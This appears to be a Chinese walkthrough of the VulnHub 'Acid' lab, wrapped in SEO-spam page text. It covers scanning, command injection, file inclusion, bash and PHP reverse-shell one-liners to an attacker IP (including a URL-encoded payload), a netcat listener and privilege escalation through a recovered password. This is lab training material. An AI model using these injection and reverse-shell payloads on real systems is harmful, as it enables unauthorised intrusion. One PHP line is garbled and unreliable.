当前位置: 首页 > news >正文

个人备案 网站名搜索引擎优化seo的英文全称是

个人备案 网站名,搜索引擎优化seo的英文全称是,专业网站制作推广服务,javaweb是做网站的吗参考链接: ​​​​​​​【VulnHub】Acid靶场复盘-CSDN博客 靶场渗透(二)——Acid渗透_ambassador 靶场渗透-CSDN博客 网络安全从0到0.5之Acid靶机实战渗透测试 | CN-SEC 中文网 Vulnhub靶场渗透练习(四) Acid - 紅人 - 博客园 红日团队…

 参考链接:

​​​​​​​【VulnHub】Acid靶场复盘-CSDN博客

靶场渗透(二)——Acid渗透_ambassador 靶场渗透-CSDN博客

网络安全从0到0.5之Acid靶机实战渗透测试 | CN-SEC 中文网

Vulnhub靶场渗透练习(四) Acid - 紅人 - 博客园

红日团队笔记

信息收集

主机:kali,靶机:Acid

下载地址:https://download.vulnhub.com/acid/Acid.rar

扫描网段:arp-scan -l

扫描端口:

nmap -A -p- -sV 192.168.91.146(扫描全部端口)

开放端口33447,底层服务:Apache2.4.10,操作系统:Ubuntu

192.168.91.146:33447访问

dirb爆破目录,其实是没有有效结果的

查看页面源代码

转码两次后获得wow.jpg

访问路径,获取图片

在editor中发现一串数字,放入十六进制转换为ascii码

7aee0f6d588ed9905ee37f16a7c610d4,32位大概率为md5

解密为63425

最后发现没啥用

爆破目录

使用dirbuster爆破目录,用small字典,爆破提示的Challenge

目录下存在index.php,error.php,cake.php,include.php,hacked.php

或者直接使用dirb调用字典

使用-x参数,爆破.php文件,用big字典

dirb http://192.168.91.146:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

渗透测试

访问cake.php,标题提示含有Magic_Box目录,爆破目录

http://192.168.91.146:33447/Challenge/cake.php/Magic_Box

这里需要多尝试 一下,/Challenge/Magic_Box,从这个位置开始访问。

命令执行

这个ip地址可以爆破出一个页面,进行命令执行

127.0.0.1;cat /etc/passwd,存在命令执行漏洞

进行命令执行测试,寻找默认密码

访问include.php,存在文件包含漏洞

转包,进行URL编码,/变为%2F,实现文件包含

关注地址为:/bin/bash

漏洞利用

使用通过URL编码的命令进行bash反弹,这里ip为攻击机(kali)的地址

bash反弹,单引号和双引号好像都行

bash -c:运行后面的字符串作为 Bash 命令。 'bash -i >& /dev/tcp/192.168.91.138/6666 0>&1':这是要执行的 Bash 命令。它包含以下几个部分: bash -i:启动一个交互式的 Bash shell。 -i 选项表示交互式。 >& /dev/tcp/192.168.91.138/6666:将标准输出和标准错误重定向到指定的 IP 地址和端口。 /dev/tcp 是一个特殊的设备文件,Bash 可以将其视为网络套接字。 0>&1:将标准输入重定向到标准输出。这样,我们就可以在远程主机上执行命令并获取输出。 此命令的目的是将被攻击主机上的 Bash shell 与指定 IP 地址和端口上的远程主机建立连接,使攻击者能够通过该连接远程控制被攻击主机并执行命令。

bash -c 'bash -i >& /dev/tcp/192.168.217.130/6666 0>&1'

127.0.0.1; bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

php反弹:

php -r '$sock=fsockopen("192.168.91.138",6666);exec("/bin/bash -i &3 2>&3");'

直接在burpsuite里进行调整,点击encode,到URL

127.0.0.1|%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%31%2e%31%33%38%2f%36%36%36%36%20%30%3e%26%31%27

192.168.217.130

监听

nc -lvp 6666

成功上线

权限提升

进行提权

这里是su执行,必须需要一个终端

python导入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd

查看用户名,

acif、saman、root为:/bin/bash

/tmp存放临时文件

/tmp$ ls /home 出现用户

这里应该是直接到home目录查看

前面已经获取了密码

查找acid用户创建的文件(不显示错误)

find:一个用于搜索文件和目录的常用命令。 /:表示要搜索的起始路径,这里是根目录。 -user acid:指定只搜索由用户"acid"创建的文件和目录。 2>/dev/null:将标准错误输出重定向到

/dev/null,即丢弃错误信息,避免出现权限错误提示。

find / -user acid 2>/dev/null

出现了一个流量包

方法一:

先进到/home,再cd到/sbin

python -m SimpleHTTPServer 8080

出现文件,下载分析

tcp.stream只看tcp协议的包

发现用户密码1337hax0r

进行提权

当前用户有 sudo 权限,想切换到 root

先切换到saman

www-data@acid:/var/www/html/Challenge/Magic_Box$ su samansu samanPassword: 1337hax0r

需要的是当前用户的密码

sudo -i

查看当前用户的权限情况

su权限过高,直接提权到root

这里不能直接su root,并不知道root密码

使用

sudo -l

只需要当前用户的密码

得到flag

http://www.dinnco.com/news/63662.html

相关文章:

  • 南昌网站建设700起百度推广和百度竞价有什么区别
  • 男鞋 东莞网站建设宁波seo排名优化培训
  • 如何设置网站布局只需要手机号的广告
  • 网站建设费用申请今日的新闻头条10条
  • 用自己电脑做服务器 网站怎么查百度收录
  • 做生存分析的网站网站优化技术
  • 建筑工程网站源码活动宣传推广方案怎么写
  • 辽宁省城乡建设规划院网站亚马逊提升关键词排名的方法
  • 5000元网站seo推广快速seo关键词优化技巧
  • 视频聊天网站怎么做什么是整合营销概念
  • wordpress 课程管理系统江门关键词排名优化
  • 虚拟币交易网站源码网站查找工具
  • 做站群什么样的算是违法网站百度指数是免费的吗
  • 网站设计中怎么做二级页面深圳网站开发制作
  • 如何压缩网站windows优化
  • 郑州网站建设找智巢宁波优化网页基本流程
  • 设计院加盟广州seo代理
  • 网站建设需要提供那些资料网店运营工资一般多少
  • 商务网站建设与维护英文谷歌seo
  • 大港手机网站建设新闻危机公关
  • 吉安市城乡规划建设局网站seo关键词是什么
  • 建设工程施工合同的特征seo产品优化免费软件
  • 建设网站的技术方案百度关键词排名怎么做
  • 大学做html个人网站素材站长工具高清无吗
  • 重庆网站开发建设山西seo顾问
  • 东莞工厂搜索引擎优化排名seo
  • 常州网站定制sem营销是什么意思
  • 赤峰做网站的广东seo网站设计
  • 锡林浩特建设局网站旺道seo优化软件怎么用
  • 福州便民网首页关键词排名优化是什么意思